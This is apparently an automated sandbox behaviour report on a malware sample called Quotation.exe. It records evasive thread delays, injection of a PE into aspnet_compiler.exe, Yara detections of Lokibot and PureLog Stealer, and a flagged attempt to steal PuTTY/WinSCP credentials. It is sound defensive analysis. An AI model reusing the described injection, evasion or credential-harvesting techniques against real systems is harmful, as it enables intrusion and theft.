Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 25C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory allocated: 4670000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598470	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598212	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597949	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597834	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597636	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 2567			Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Window / User API: threadDelayed 732			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6536	Thread sleep count: 2567 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6536	Thread sleep count: 732 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598470s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598342s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598212s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -598090s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -597949s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -597834s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6480	Thread sleep time: -597636s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6684	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe TID: 6300	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3540	Thread sleep time: -240000s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

5_2_00403D74

Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598470	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598342	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598212	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 598090	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597949	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597834	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 597636	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: Quotation.exe, 00000002.00000002.1342727232.00000000009C2000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_0040317B mov eax, dword ptr fs:[00000030h]

5_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 5_2_00402B7C GetProcessHeap,RtlAllocateHeap,

5_2_00402B7C

Source: C:\Users\user\Desktop\Quotation.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Quotation.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quotation.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\Quotation.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: EDE008	Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Queries volume information: C:\Users\user\Desktop\Quotation.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Quotation.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Quotation.exe.3699570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2553316944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003699000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343184318.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1343631435.0000000003679000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quotation.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 1648, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2554104862.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: Quotation.exe, type: SAMPLE
Source: Yara match	File source: 2.0.Quotation.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000000.1280573223.0000000000362000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

